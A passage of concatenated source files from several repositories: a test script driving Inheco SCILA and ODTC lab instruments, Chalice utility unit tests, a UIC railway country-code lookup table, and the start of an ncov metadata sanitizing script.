        rv = scila.SetConfiguration(cx.GetParamsXml())
        assert rv.Success == True
        # Initialize
        rv = scila.Initialize()
        assert rv.Success == True
        s = GetStatus(scila)
        assert s.State == "Idle"
        # Delay 1s
        rv = scila.Delay(1)
        assert rv.Success == True
        # GetAutoBoostCo2
        rv = scila.GetAutoBoostCo2()
        assert rv.Success == True
        print(rv.ResponseData.AutoBoostCO2)
        print(rv.ResponseData.BoostState)
        # GetCo2FlowStatus
        rv = scila.GetCo2FlowStatus()
        assert rv.Success == True
        print(rv.ResponseData.CO2FlowStatus)
        # GetDoorStatus
        rv = scila.GetDoorStatus()
        assert rv.Success == True
        print(rv.ResponseData.Drawer1)
        print(rv.ResponseData.Drawer2)
        print(rv.ResponseData.Drawer3)
        print(rv.ResponseData.Drawer4)
        # GetLiquidLevel
        rv = scila.GetLiquidLevel()
        assert rv.Success == True
        print(rv.ResponseData.LiquidLevel)
        # GetParameters
        rv = scila.GetParameters()
        assert rv.Success == True
        print(rv.ResponseData.Position)
        print(rv.ResponseData.WorkstationMode)
        # New Parameters config example
        px = ScilaParamsXmlWrapper()
        px.Position = 1
        px.WorkstationMode = False
        print(px.GetParamsXml())
        # SetParameters
        rv = scila.SetParameters(px.GetParamsXml())
        assert rv.Success == True
        # GetTemperature
        rv = scila.GetTemperature()
        assert rv.Success == True
        print(rv.ResponseData.CurrentTemperature)
        print(rv.ResponseData.TargetTemperature)
        print(rv.ResponseData.TemperatureControl)
        # GetValveStatus
        rv = scila.GetValveStatus()
        assert rv.Success == True
        print(rv.ResponseData.Gas_Boost)
        print(rv.ResponseData.Gas_Normal)
        print(rv.ResponseData.H2O)
        # Open-/CloseDoor
        rv = scila.PrepareForInput(4)
        assert rv.Success == True
        rv = scila.OpenDoor()
        assert rv.Success == True
        # invoke StatusEvent: multiple doors
        rv = scila.PrepareForInput(3)
        assert rv.Success == True
        rv = scila.OpenDoor()
        assert rv.Success == False
        # rv = scila.RetrieveByPositionId(2) #TODO Fix CommandException
        # assert rv.Success == True
        # SetAutoBoostCo2
        rv = scila.SetAutoBoostCo2(True)
        assert rv.Success == True
        # SetCo2NormalFlow
        rv = scila.SetCo2NormalFlow(True)
        assert rv.Success == True
        # SetTemperature
        rv = scila.SetTemperature(37, True)
        assert rv.Success == True
        rv = scila.SetTemperature(None, True)
        assert rv.Success == True
        rv = scila.SetTemperature(None, None)
        assert rv.Success == True
        rv = scila.SetTemperature(37, False)
        assert rv.Success == True
        # rv = scila.StoreAtPosition(2) #TODO Fix CommandException
        # assert rv.Success == True
        # Disconnect
        print(scila.DeviceName + " dispose")
        scila.Dispose()
    '''ODTC'''
    if config['IHC']['ODTC'] == "True":
        print("ODTC Dll Version: " + OdtcWrapper.GetAssemblyVersion())
        deviceIp = "192.168.1.195" # predefined odtc ip
        (r, di) = PmsWrapper.GetDeviceIdentification(deviceIp)
        assert r.ReturnCode == 1
        status = PmsWrapper.GetStatus(deviceIp)
        print(di.DeviceName + " state: " + status.State)
        print(di.DeviceName + " locked: " + str(status.Locked))
        print(di.DeviceName + " build: " + di.DeviceFirmwareVersion)
        print(di.DeviceName + " fw: " + di.DeviceFirmwareVersion[29:32])
        legacy = False
        if int(di.DeviceFirmwareVersion[29:32]) <= 232:
            legacy = True
        if not legacy: # skip finder for incompatible older versions
            frOdtcs = OdtcFinderWrapper.SearchDevices()
            if len(frOdtcs) == 0:
                print("No ODTC found")
            for val in frOdtcs:
                print("Finder result: " + val.Name + " " + str(val.WsdlUri))
                # Gather device info before Create()
                status2 = PmsWrapper.GetStatus(val.IPv4Address)
                print(val.Name + " state: " + status2.State)
                # BUG FIX: Locked is a bool — stringify before concatenation
                # (consistent with the pre-finder print above).
                print(val.Name + " locked: " + str(status2.Locked))
                (r, di2) = PmsWrapper.GetDeviceIdentification(val.IPv4Address)
                assert r.ReturnCode == 1
                print("Pre-connect GetDeviceIdentification: " + di2.DeviceName + " " + di2.Wsdl + " " + di2.DeviceFirmwareVersion)
        # with pms.Create("http://10.2.2.8/odtc.wsdl") as odtc:
        #     odtc.Reset()
        #     odtc.Initialize()
        # Download logs and latest trace file
        print("Start log/trace download...")
        error = DownloadOdtcLogTraces(ip=deviceIp, path="/home/for/dev/logDownload/" + di.DeviceName, traceFileCount=1, logs=True, legacy=legacy)
        assert(error is None)
        print("log/trace download finished")
        # Create device
        try:
            odtc = pms.Create("http://" + deviceIp + "/odtc.wsdl")
        except Exception as ex:
            if (ex.Message) == "Invalid lockId.":
                odtc = pms.Create("http://" + deviceIp + "/odtc.wsdl", "myLockId")
            else:
                raise
        # Register Callback(s)
        odtc.RegisterStatusEventCallback(OnStatusEvent)
        odtc.RegisterDataEventCallback(OnDataEvent)
        print("Device Name: " + odtc.DeviceName)
        print("Current LockId: " + str(odtc.LockId))
        di = GetDeviceIdentification(odtc)
        if legacy == False:
            assert di.DeviceName == odtc.DeviceName
        else:
            assert di.DeviceName == "ODTC"
        s = GetStatus(odtc)
        assert s.State != "InError"
        rv = odtc.Reset()
        assert rv.Success == True
        # if rv.Success == False:
        #     print("ODTC Reset error: " + rv.Message)
        #     print("Exit")
        #     #return
        #     exit()
        s = GetStatus(odtc)
        assert s.State == "Standby"
        # Lock device
        odtc.LockId = "myLockId"
        rv = odtc.LockDevice()
        assert rv.Success == True
        # Test lock
        s = GetStatus(odtc)
        assert s.Locked == True
        odtc.LockId = None # Set Wrong lockId
        rv = odtc.GetConfiguration()
        assert rv.Success == False
        # Unlock device
        odtc.LockId = "myLockId"
        rv = odtc.UnlockDevice()
        assert rv.Success == True
        s = GetStatus(odtc)
        assert s.Locked == False
        rv = odtc.GetConfiguration()
        assert rv.Success == True
        print(rv.ResponseData.LogLevel)
        print(rv.ResponseData.NetworkConfig)
        print(rv.ResponseData.SoapCompression)
        print(rv.ResponseData.SysDateTime)
        print(rv.ResponseData.UseDeviceClassDateTime)
        cx = OdtcConfigXmlWrapper()
        cx.ImportNetworkConfigXml("dhcp.xml")
        print(cx.GetParamsXml())
        rv = odtc.SetConfiguration(cx.GetParamsXml())
        assert rv.Success == True
        rv = odtc.Initialize()
        assert rv.Success == True
        rv = odtc.StopMethod()
        assert rv.Success == True
        time.sleep(0.1) # workaround odtc reports State==Busy
        s = GetStatus(odtc)
        assert s.State == "Idle"
        rv = odtc.GetParameters()
        assert rv.Success == True
        print(rv.ResponseData.CSVSeparatorCharacter)
        print(rv.ResponseData.DynamicPreMethodDuration)
        print(rv.ResponseData.ExecuteMethodDataEvent)
        print(rv.ResponseData.MatchLidTemperatures)
        print(rv.ResponseData.MethodsXML)
        for pm in rv.ResponseData.GetPreMethodNames():
            print(pm)
        for m in rv.ResponseData.GetMethodNames():
            print(m)
        px = OdtcParamsXmlWrapper()
        px.ImportMethodSetXml("methodSet-example.xml")
        print(px.GetParamsXml())
        rv = odtc.SetParameters(px.GetParamsXml())
        assert rv.Success == True
        rv = odtc.StopMethod()
        assert rv.Success == True
        rv = odtc.GetLastData()
        assert rv.Success == True
        print(rv.ResponseData.Name)
        print(rv.ResponseData.Data)
        rv = odtc.ReadActualTemperature()
        assert rv.Success == True
        at = rv.ResponseData.SensorValues
        print("Mount: " + str(at.Mount / 100))
        print("Lid: " + str(at.Lid / 100))
        print(at)
        t = threading.Thread(target=PollRAT, args=(odtc,))
        t.start()
        print("ExecuteMethod")
        rv = odtc.ExecuteMethod("PRE25")
        assert rv.Success == True # PollRat-Thread invokes StopMethod() after x iterations
        print("ExecuteMethod finished")
        print("OpenDoor")
        rv = odtc.OpenDoor()
        assert rv.Success == True
        print("OpenDoor finished")
        print("CloseDoor")
        rv = odtc.CloseDoor()
        assert rv.Success == True
        print("CloseDoor finished")
        t.join()
        print(odtc.DeviceName + " dispose")
        odtc.Dispose()
    #input("Press Enter to continue...")
    print("Exit")
def GetStatus(device: DeviceWrapper) -> StatusWrapper:
    """Query *device* for its status, assert the call succeeded, and return it."""
    if device is None:
        raise TypeError
    (ret, status) = device.GetStatus()
    assert ret.ReturnCode == 1
    # PMSId may be empty; only include it in the debug line when present.
    pms_part = (" " + status.PMSId) if status.PMSId else ""
    logging.debug(status.DeviceId + " " + status.CurrentTime + " " + str(status.Locked) + pms_part + " " + status.State)
    return status
def GetDeviceIdentification(device: DeviceWrapper) -> DeviceIdentificationWrapper:
    """Fetch *device*'s identification record, assert success, and return it."""
    if device is None:
        raise TypeError
    (ret, ident) = device.GetDeviceIdentification()
    assert ret.ReturnCode == 1
    parts = [ident.DeviceName, ident.DeviceSerialNumber, ident.DeviceFirmwareVersion,
             ident.DeviceManufacturer, ident.Wsdl, str(ident.SiLADeviceClass)]
    logging.debug(" ".join(parts))
    return ident
def OnStatusEvent(sea: StatusEventArgsWrapper):
    """Callback for device status events: print classification, code, and hint."""
    assert sea is not None
    desc = sea.EventDescription
    print(desc.Classification + " received from " + sea.Device.DeviceName + ": ")
    code_details = " (Code " + str(desc.InternalCode) + " " + desc.InternalCodeName + " " + desc.InternalCodeDescription + ")"
    print(str(sea.ReturnValue.ReturnCode) + " " + desc.StatusMessage + code_details)
    print("Correction hint: " + desc.FaultCorrectionsHints)
if config['IHC']['ODTC'] == "True":
    def OnDataEvent(dataEventSensorValues: List[DataEventOdtcSensorValue]):
        """Callback for ODTC data events: dump every sensor value received."""
        for sensor_value in dataEventSensorValues:
            print(sensor_value)
        print("OnDataEvent called")
if config['IHC']['ODTC'] == "True":
    def PollRAT(odtc: OdtcWrapper, iterations = 5):
        """Poll ReadActualTemperature once per second for *iterations*, then stop the running method."""
        assert odtc is not None
        for _ in range(iterations):
            reply = odtc.ReadActualTemperature()
            assert reply.Success == True
            sensors = reply.ResponseData.SensorValues
            print("Async Polling RAT - Mount: " + str(sensors.Mount / 100))
            time.sleep(1)
        # Test SubStates (parallel command processing)
        current = GetStatus(odtc)
        for sub in current.SubStates:
            print("SubStates: " + sub.CommandName + " " + str(sub.RequestId) + " " + sub.CurrentState + " " + str(sub.QueuePosition) + " " + sub.StartedAt)
        print("StopMethod (from PollRAT)")
        reply = odtc.StopMethod()
        assert reply.Success == True
if config['IHC']['ODTC'] == "True":
    def DownloadOdtcLogTraces(ip: str, path: str, traceFileCount: int, logs: bool = True, legacy: bool = False):
        """Download ODTC log folders and the newest trace files via FTP into *path*.

        traceFileCount selects how many of the most recent traces to fetch
        (0 = none, negative = all). Returns the downloader's error, or None
        on success.
        """
        assert ip is not None
        assert path is not None
        downloader = OdtcDownloaderWrapper()

        def fetch_folder(folder, skip=None):
            # Mark every entry in *folder* (except *skip*) and transfer it.
            entries = downloader.GetItems(ip, folder)
            for entry in entries:
                if entry.Value != skip:
                    entry.Download = True
            return downloader.DownloadFtpItems(entries, path)

        if logs:
            if legacy:
                # Legacy firmware: device logs only, minus the SiLA log file.
                err = fetch_folder("Logs", skip="InhecoSiLA.log")
                if err is not None:
                    return err
            else:
                # Current firmware: SiLA logs, then device logs.
                for folder in ("SiLA", "Odtc"):
                    err = fetch_folder(folder)
                    if err is not None:
                        return err
        if traceFileCount == 0:
            return None
        entries = downloader.GetItems(ip, "Traces")
        # Newest-first by name; only the first traceFileCount are marked.
        traces = sorted(
            (entry for entry in entries if entry.IsTrace == True),
            key=lambda entry: entry.Value,
            reverse=True,
        )
        limit = len(traces) if traceFileCount < 0 else traceFileCount
        for entry in traces[:limit]:
            entry.Download = True
        return downloader.DownloadFtpItems(traces, path)
if config['IHC']['SCILA'] == "True":
    def DownloadScilaLogTraces(ip: str, path: str, traceFileCount: int, logs: bool = True) -> str:
        """Download SCILA log folders and the newest trace files via FTP into *path*.

        traceFileCount selects how many of the most recent traces to fetch
        (0 = none, negative = all). Returns the downloader's error, or None
        on success.
        """
        assert ip is not None
        assert path is not None
        downloader = ScilaDownloaderWrapper()

        def fetch_folder(folder):
            # Mark every entry in *folder* for download and transfer it.
            entries = downloader.GetItems(ip, folder)
            for entry in entries:
                entry.Download = True
            return downloader.DownloadFtpItems(entries, path)

        if logs:
            # SiLA logs first, then device logs.
            for folder in ("SiLA", "Scila/Logs"):
                err = fetch_folder(folder)
                if err is not None:
                    return err
        if traceFileCount == 0:
            return None
        entries = downloader.GetItems(ip, "Scila/Traces")
        # Newest-first by the numeric part of the file name; only the first
        # traceFileCount are marked.
        traces = sorted(
            (entry for entry in entries if entry.IsTrace == True),
            key=lambda entry: int(entry.Value[7: entry.Value.index(".")]),
            reverse=True,
        )
        limit = len(traces) if traceFileCount < 0 else traceFileCount
        for entry in traces[:limit]:
            entry.Download = True
        return downloader.DownloadFtpItems(traces, path)
if __name__ == "__main__":
    # Run the hardware exercise only when executed as a script.
    main()
|
<reponame>Chen188/chalice
import os
import re
import mock
import sys
import click
import pytest
from six import StringIO
from hypothesis.strategies import text
from hypothesis import given
import string
from dateutil import tz
from datetime import datetime
from chalice import utils
class TestUI(object):
    """Tests for utils.UI stream routing and confirmation handling."""

    def setup(self):
        self.out = StringIO()
        self.err = StringIO()
        self.ui = utils.UI(self.out, self.err)

    def test_write_goes_to_out_obj(self):
        # write() targets the out stream and leaves err untouched.
        self.ui.write("Foo")
        assert self.out.getvalue() == 'Foo'
        assert self.err.getvalue() == ''

    def test_error_goes_to_err_obj(self):
        # error() targets the err stream and leaves out untouched.
        self.ui.error("Foo")
        assert self.err.getvalue() == 'Foo'
        assert self.out.getvalue() == ''

    def test_confirm_raises_own_exception(self):
        # click.Abort from the underlying prompt is wrapped in AbortedError.
        aborting_confirm = mock.Mock(spec=click.confirm)
        aborting_confirm.side_effect = click.Abort()
        ui = utils.UI(self.out, self.err, aborting_confirm)
        with pytest.raises(utils.AbortedError):
            ui.confirm("Confirm?")

    def test_confirm_returns_value(self):
        # A successful prompt's value is passed straight through.
        fake_confirm = mock.Mock(spec=click.confirm)
        fake_confirm.return_value = 'foo'
        ui = utils.UI(self.out, self.err, fake_confirm)
        assert ui.confirm("Confirm?") == 'foo'
class TestChaliceZip(object):
    """ChaliceZipFile should pin timestamps and preserve unix permissions."""

    def test_chalice_zip_file(self, tmpdir):
        tmpdir.mkdir('foo').join('app.py').write('# Test app')
        zip_path = tmpdir.join('app.zip')
        app_filename = str(tmpdir.join('foo', 'app.py'))
        # Add an executable file to test preserving permissions.
        script_obj = tmpdir.join('foo', 'myscript.sh')
        script_obj.write('echo foo')
        script_file = str(script_obj)
        os.chmod(script_file, 0o755)
        with utils.ChaliceZipFile(str(zip_path), 'w') as archive:
            archive.write(app_filename)
            archive.write(script_file)
        with utils.ChaliceZipFile(str(zip_path)) as archive:
            assert len(archive.infolist()) == 2
            for source_path in (app_filename, script_file):
                # Member names drop the leading '/'.
                info = archive.getinfo(source_path[1:])
                # Timestamps are pinned for reproducible builds.
                assert info.date_time == (1980, 1, 1, 0, 0, 0)
                # The high 16 bits of external_attr carry the unix mode.
                assert info.external_attr >> 16 == os.stat(source_path).st_mode
class TestPipeReader(object):
    """PipeReader reads piped stdin but returns None for a TTY."""

    def _make_stream(self, is_tty):
        # A fake stdin whose isatty() answer we control.
        stream = mock.Mock(spec=sys.stdin)
        stream.isatty.return_value = is_tty
        stream.read.return_value = 'foobar'
        return stream

    def test_pipe_reader_does_read_pipe(self):
        reader = utils.PipeReader(self._make_stream(is_tty=False))
        assert reader.read() == 'foobar'

    def test_pipe_reader_does_not_read_tty(self):
        reader = utils.PipeReader(self._make_stream(is_tty=True))
        assert reader.read() is None
def test_serialize_json():
    # serialize_to_json pretty-prints with two-space indent and a trailing
    # newline.
    expected = '{\n  "foo": "bar"\n}\n'
    assert utils.serialize_to_json({'foo': 'bar'}) == expected
@pytest.mark.parametrize('name,cfn_name', [
    ('f', 'F'),
    ('foo', 'Foo'),
    ('foo_bar', 'FooBar'),
    ('foo_bar_baz', 'FooBarBaz'),
    ('F', 'F'),
    ('FooBar', 'FooBar'),
    ('S3Bucket', 'S3Bucket'),
    ('s3Bucket', 'S3Bucket'),
    ('123', '123'),
    ('foo-bar-baz', 'FooBarBaz'),
    ('foo_bar-baz', 'FooBarBaz'),
    ('foo-bar_baz', 'FooBarBaz'),
    # Not actually possible, but we should
    # ensure we only have alphanumeric chars.
    ('foo_bar!?', 'FooBar'),
    ('_foo_bar', 'FooBar'),
])
def test_to_cfn_resource_name(name, cfn_name):
    # Separators ('_' and '-') are dropped and each resulting piece is
    # capitalized, yielding an alphanumeric CamelCase logical id.
    assert utils.to_cfn_resource_name(name) == cfn_name
@given(name=text(alphabet=string.ascii_letters + string.digits + '-_'))
def test_to_cfn_resource_name_properties(name):
    """Property: any successful conversion yields only [A-Za-z0-9]."""
    try:
        converted = utils.to_cfn_resource_name(name)
    except ValueError:
        # Rejecting bad input is an acceptable outcome.
        return
    assert re.search('[^A-Za-z0-9]', converted) is None
class TestTimestampUtils(object):
    """Tests for TimestampConverter's ISO-8601 and relative timestamp parsing."""
    def setup(self):
        # Inject a mocked "utcnow" so relative timestamps ('1s', '1d', ...)
        # are computed against a deterministic reference time.
        self.mock_now = mock.Mock(spec=datetime.utcnow)
        self.set_now()
        self.timestamp_convert = utils.TimestampConverter(self.mock_now)
    def set_now(self, year=2020, month=1, day=1, hour=0, minute=0, sec=0):
        # Pin the converter's notion of "now" to a UTC-aware datetime.
        self.now = datetime(
            year, month, day, hour, minute, sec, tzinfo=tz.tzutc())
        self.mock_now.return_value = self.now
    def test_iso_no_timezone(self):
        # Naive ISO timestamps parse to naive datetimes.
        assert self.timestamp_convert.timestamp_to_datetime(
            '2020-01-01T00:00:01.000000') == datetime(2020, 1, 1, 0, 0, 1)
    def test_iso_with_timezone(self):
        # An explicit UTC offset is preserved in the result.
        assert (
            self.timestamp_convert.timestamp_to_datetime(
                '2020-01-01T00:00:01.000000-01:00'
            ) == datetime(2020, 1, 1, 0, 0, 1, tzinfo=tz.tzoffset(None, -3600))
        )
    def test_to_datetime_relative_second(self):
        self.set_now(sec=2)
        assert (
            self.timestamp_convert.timestamp_to_datetime('1s') ==
            datetime(2020, 1, 1, 0, 0, 1, tzinfo=tz.tzutc())
        )
    def test_to_datetime_relative_multiple_seconds(self):
        self.set_now(sec=5)
        assert (
            self.timestamp_convert.timestamp_to_datetime('2s') ==
            datetime(2020, 1, 1, 0, 0, 3, tzinfo=tz.tzutc())
        )
    def test_to_datetime_relative_minute(self):
        self.set_now(minute=2)
        assert (
            self.timestamp_convert.timestamp_to_datetime('1m') ==
            datetime(2020, 1, 1, 0, 1, 0, tzinfo=tz.tzutc())
        )
    def test_to_datetime_relative_hour(self):
        self.set_now(hour=2)
        assert (
            self.timestamp_convert.timestamp_to_datetime('1h') ==
            datetime(2020, 1, 1, 1, 0, 0, tzinfo=tz.tzutc())
        )
    def test_to_datetime_relative_day(self):
        self.set_now(day=3)  # now = 2020-01-03
        assert (
            self.timestamp_convert.timestamp_to_datetime('1d') ==
            datetime(2020, 1, 2, 0, 0, 0, tzinfo=tz.tzutc())
        )
    def test_to_datetime_relative_week(self):
        self.set_now(day=14)
        assert (
            self.timestamp_convert.timestamp_to_datetime('1w') ==
            datetime(2020, 1, 7, 0, 0, 0, tzinfo=tz.tzutc())
        )
@pytest.mark.parametrize('timestamp,expected', [
    ('2020-01-01', datetime(2020, 1, 1)),
    ('2020-01-01T00:00:01', datetime(2020, 1, 1, 0, 0, 1)),
    ('2020-02-02T01:02:03', datetime(2020, 2, 2, 1, 2, 3)),
    ('2020-01-01T00:00:00Z', datetime(2020, 1, 1, 0, 0, tzinfo=tz.tzutc())),
    ('2020-01-01T00:00:00-04:00', datetime(2020, 1, 1, 0, 0, 0,
                                           tzinfo=tz.tzoffset('EDT', -14400))),
])
def test_parse_iso8601_timestamp(timestamp, expected):
    # Naive timestamps stay naive; an explicit 'Z' or numeric offset
    # produces a timezone-aware datetime.
    timestamp_convert = utils.TimestampConverter()
    assert timestamp_convert.parse_iso8601_timestamp(timestamp) == expected
|
<reponame>neilalbrock/python-uic920<gh_stars>1-10
# -*- coding: utf-8 -*-
import re
from numbers import Integral
from collections import namedtuple
__all__ = ["countries"]
Country = namedtuple('Country', 'name, iso, uic')
_records = [
Country(u"Finland", "FI", "10"),
Country(u"Russian Federation", "RU", "20"),
Country(u"Belarus", "BY", "21"),
Country(u"Ukraine", "UA", "22"),
Country(u"Moldova, Republic of", "MD", "23"),
Country(u"Lithuania", "LT", "24"),
Country(u"Latvia", "LV", "25"),
Country(u"Estonia", "EE", "26"),
Country(u"Kazakhstan", "KZ", "27"),
Country(u"Georgia", "GE", "28"),
Country(u"Uzbekistan", "UZ", "29"),
Country(u"Korea, Democratic People's Republic of", "KP", "30"),
Country(u"Mongolia", "MN", "31"),
Country(u"Viet nam", "VN", "32"),
Country(u"China", "CN", "33"),
Country(u"Cuba", "CU", "40"),
Country(u"Albania", "AL", "41"),
Country(u"Japan", "JP", "42"),
Country(u"Bosnia and Herzegovina, Serb Republic of ", "BA", "44"),
Country(u"Bosnia and Herzegovina, Muslim-Croat Federation of ", "BA", "50"),
Country(u"Poland", "PL", "51"),
Country(u"Bulgaria", "BG", "52"),
Country(u"Romania", "RO", "53"),
Country(u"Czech Republic", "CZ", "54"),
Country(u"Hungary", "HU", "55"),
Country(u"Slovakia", "SK", "56"),
Country(u"Azerbaijan", "AZ", "57"),
Country(u"Armenia", "AM", "58"),
Country(u"Kyrgyzstan", "KG", "59"),
Country(u"Ireland", "IE", "60"),
Country(u"Korea, Republic of", "KR", "61"),
Country(u"Montenegro", "ME", "62"),
Country(u"Macedonia, The former Yugoslav Republic of", "MK", "65"),
Country(u"Tajikistan", "TJ", "66"),
Country(u"Turkmenistan", "TM", "67"),
Country(u"United Kingdom of Great Britain and Northern Ireland", "GB", "70"),
Country(u"Spain", "ES", "71"),
Country(u"Serbia", "RS", "72"),
Country(u"Greece", "GR", "73"),
Country(u"Sweden", "SE", "74"),
Country(u"Turkey", "TR", "75"),
Country(u"Norway", "NO", "76"),
Country(u"Croatia", "HR", "78"),
Country(u"Slovenia", "SI", "79"),
Country(u"Germany", "DE", "80"),
Country(u"Austria", "AT", "81"),
Country(u"Luxemburg", "LU", "82"),
Country(u"Italy", "IT", "83"),
Country(u"Netherlands", "NL", "84"),
Country(u"Switzerland", "CH", "85"),
Country(u"Denmark", "DK", "86"),
Country(u"France", "FR", "87"),
Country(u"Belgium", "BE", "88"),
Country(u"Egypt", "EG", "90"),
Country(u"Tunesia", "TN", "91"),
Country(u"Algeria", "DZ", "92"),
Country(u"Morocco", "MA", "93"),
Country(u"Portugal", "PT", "94"),
Country(u"Israel", "IL", "95"),
Country(u"Iran, Islamic Republic of", "IR", "96"),
Country(u"Syrian Arab Republic", "SY", "97"),
Country(u"Lebanon", "LB", "98"),
Country(u"Iraq", "IQ", "99")]
def _build_index(idx):
return dict((r[idx], r) for r in _records)
_by_iso = _build_index(1)
_by_uic = _build_index(2)
class _CountryLookup(object):
    """Read-only lookup over the UIC country table.

    ``get`` accepts an integer UIC code, a two-digit UIC string, or a
    two-letter ISO code; iterating yields every known Country record.
    """

    def get(self, key):
        if isinstance(key, Integral):
            return _by_uic["%d" % key]
        normalized = key.upper()
        if len(normalized) != 2:
            raise ValueError()
        if re.match(r"[0-9]{2}", normalized):
            return _by_uic[normalized]
        return _by_iso[normalized]

    def __iter__(self):
        return iter(_records)


countries = _CountryLookup()
<reponame>jkmcpherson/ncov
import argparse
from augur.io import open_file, read_metadata
import csv
import os
from pathlib import Path
import pandas as pd
import re
import sys
from tempfile import NamedTemporaryFile
from utils import extract_tar_file_contents
# Define all possible geographic scales we could expect in the GISAID location
# field.
# Ordered from broadest to narrowest; parse_location_string relies on this
# order when zipping parsed values onto field names.
LOCATION_FIELDS = (
    "region",
    "country",
    "division",
    "location",
)
class MissingColumnException(Exception):
    """Raised when a column expected in the metadata is absent."""
class DuplicateException(Exception):
    """Raised when duplicate metadata records share the same strain name."""
def parse_new_column_names(renaming_rules):
    """Parse the mapping of current to new column names from the given list of renaming rules.

    Parameters
    ----------
    renaming_rules : list[str]
        A list of strings mapping an old column name to a new one delimited by an equal symbol (e.g., "old_column=new_column").

    Returns
    -------
    dict :
        A mapping of new column names for each old column name.

    >>> parse_new_column_names(["old=new", "new=old"])
    {'old': 'new', 'new': 'old'}

    Only the first equal symbol delimits, so new names may contain "=".

    >>> parse_new_column_names(["old=new=name"])
    {'old': 'new=name'}

    >>> parse_new_column_names(["old->new"])
    {}

    """
    new_column_names = {}
    for rule in renaming_rules:
        if "=" in rule:
            # Split on the first "=" only; a bare split() would raise
            # ValueError during unpacking for rules like "a=b=c".
            old_column, new_column = rule.split("=", 1)
            new_column_names[old_column] = new_column
        else:
            print(
                f"WARNING: missing mapping of old to new column in form of 'Virus name=strain' for rule: '{rule}'.",
                file=sys.stderr
            )
    return new_column_names
def parse_location_string(location_string, location_fields):
    """Split a GISAID location string into the requested geographic scales.

    Parameters
    ----------
    location_string : str
    location_fields : list

    Returns
    -------
    dict :
        dictionary of geographic fields parsed from the given string

    >>> location_fields = ["region", "country", "division", "location"]
    >>> parse_location_string("Asia / Japan", location_fields)
    {'region': 'Asia', 'country': 'Japan', 'division': '?', 'location': '?'}
    >>> parse_location_string("North America / USA / Washington / King County", location_fields)
    {'region': 'North America', 'country': 'USA', 'division': 'Washington', 'location': 'King County'}
    >>> parse_location_string("North America/USA/New York/New York", location_fields)
    {'region': 'North America', 'country': 'USA', 'division': 'New York', 'location': 'New York'}
    >>> parse_location_string("Europe/ Lithuania", location_fields)
    {'region': 'Europe', 'country': 'Lithuania', 'division': '?', 'location': '?'}
    """
    # Split on "/" with optional surrounding spaces, tolerating inconsistent
    # delimiting; entries beyond the requested fields (including the empty
    # string from a trailing delimiter) are dropped by zip below.
    parsed_values = re.split(r"[ ]*/[ ]*", location_string)
    # Default every requested scale to missing, then fill from the string.
    result = {field: "?" for field in location_fields}
    result.update(zip(location_fields, parsed_values))
    return result
def strip_prefixes(strain_name, prefixes):
    """Strip the given prefixes from the given strain name.

    Parameters
    ----------
    strain_name : str
        Name of a strain to be sanitized
    prefixes : list[str]
        A list of prefixes to be stripped from the strain name.

    Returns
    -------
    str :
        Strain name without any of the given prefixes.

    >>> strip_prefixes("hCoV-19/RandomStrain/1/2020", ["hCoV-19/", "SARS-CoV-2/"])
    'RandomStrain/1/2020'
    >>> strip_prefixes("SARS-CoV-2/RandomStrain/2/2020", ["hCoV-19/", "SARS-CoV-2/"])
    'RandomStrain/2/2020'
    >>> strip_prefixes("hCoV-19/RandomStrain/1/2020", ["SARS-CoV-2/"])
    'hCoV-19/RandomStrain/1/2020'

    """
    # Escape each prefix so regex metacharacters (e.g., ".") are matched
    # literally instead of being interpreted as patterns.
    joined_prefixes = "|".join(re.escape(prefix) for prefix in prefixes)
    pattern = f"^({joined_prefixes})"
    return re.sub(pattern, "", strain_name)
def get_database_ids_by_strain(metadata_file, metadata_id_columns, database_id_columns, metadata_chunk_size, error_on_duplicates=False):
    """Get a mapping of all database ids for each strain name.
    Parameters
    ----------
    metadata_file : str or Path-like or file object
        Path or file object for a metadata file to process.
    metadata_id_columns : list[str]
        A list of potential id columns for strain names in the metadata.
    database_id_columns : list[str]
        A list of potential database id columns whose values can be used to deduplicate records with the same strain name.
    metadata_chunk_size : int
        Number of records to read into memory at once from the metadata.
    error_on_duplicates : bool
        Throw an error when duplicate records are detected.
    Returns
    -------
    str or Path-like or file object or None :
        Path or file object containing the mapping of database ids for each
        strain name (one row per combination). Returns None, if no valid
        database ids were found and no duplicates exist.
    Raises
    ------
    DuplicateException :
        When duplicates are detected and the caller has requested an error on duplicates.
    Exception :
        When none of the requested metadata id columns exist.
    """
    # Stream the metadata in chunks so arbitrarily large files fit in memory.
    metadata_reader = read_metadata(
        metadata_file,
        id_columns=metadata_id_columns,
        chunk_size=metadata_chunk_size,
    )
    # Track strains we have observed, so we can alert the caller to duplicate
    # strains when an error on duplicates has been requested.
    observed_strains = set()
    duplicate_strains = set()
    # delete=False so the temporary mapping file survives this `with` block;
    # the caller is responsible for removing the returned path later.
    with NamedTemporaryFile(delete=False, mode="wt", newline='') as mapping_file:
        mapping_path = mapping_file.name
        # Only the first chunk written to the mapping file emits a header row.
        header = True
        for metadata in metadata_reader:
            # Check for database id columns.
            valid_database_id_columns = metadata.columns.intersection(
                database_id_columns
            )
            if mapping_path and len(valid_database_id_columns) == 0:
                # Do not write out mapping of ids. Default to error on
                # duplicates, since we have no way to resolve duplicates
                # automatically.
                mapping_path = None
                error_on_duplicates = True
                print(
                    "WARNING: Skipping deduplication of metadata records.",
                    f"None of the possible database id columns ({database_id_columns}) were found in the metadata's columns {tuple([metadata.index.name] + metadata.columns.values.tolist())}",
                    file=sys.stderr
                )
            # Track duplicates in memory, as needed.
            if error_on_duplicates:
                for strain in metadata.index.values:
                    if strain in observed_strains:
                        duplicate_strains.add(strain)
                    else:
                        observed_strains.add(strain)
            if mapping_path:
                # Write mapping of database and strain ids to disk.
                metadata.loc[:, valid_database_id_columns].to_csv(
                    mapping_file,
                    sep="\t",
                    header=header,
                    index=True,
                )
                header = False
    # Clean up temporary file.
    if mapping_path is None:
        os.unlink(mapping_file.name)
    if error_on_duplicates and len(duplicate_strains) > 0:
        # NOTE(review): assumes metadata_file is a str path here; a Path or
        # file object would fail on this concatenation — confirm callers.
        duplicates_file = metadata_file + ".duplicates.txt"
        with open(duplicates_file, "w") as oh:
            for strain in duplicate_strains:
                oh.write(f"{strain}\n")
        raise DuplicateException(f"{len(duplicate_strains)} strains have duplicate records. See '{duplicates_file}' for more details.")
    return mapping_path
def filter_duplicates(metadata, database_ids_by_strain):
    """Filter duplicate records by the strain name in the given data frame index
    using the given file containing a mapping of strain names to database ids.
    Database ids allow us to identify duplicate records that need to be
    excluded. We prefer the latest record for a given strain name across all
    possible database ids and filter out all other records for that same strain
    name.
    Parameters
    ----------
    metadata : pandas.DataFrame
